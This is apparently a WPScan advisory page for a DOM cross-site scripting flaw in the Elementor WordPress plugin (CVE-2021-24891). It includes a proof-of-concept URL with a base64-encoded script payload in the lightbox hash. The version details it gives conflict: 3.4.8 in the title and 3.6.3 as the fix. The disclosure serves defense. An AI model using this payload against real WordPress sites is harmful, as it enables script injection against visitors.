WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Elementor < 3.4.8 - DOM Cross-Site-Scripting

Description

The plugin does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue.

The issue was initially fixed in 3.1.4, however re-introduced in 3.2.0.

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9

Affects Plugins

elementor
Fixed in version 3.6.3

References

CVE
CVE-2021-24891
URL
https://www.jbelamor.com/xss-elementor-lightox.html

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Joel

Submitter

Joel

Submitter website
https://www.jbelamor.com/
Verified

Yes

WPVDB ID
fbed0daa-007d-4f91-8d87-4bca7781de2d

Timeline

Publicly Published

2021-03-24 (about 2 years ago)

Added

2021-10-20 (about 1 years ago)

Last Updated

2022-04-14 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin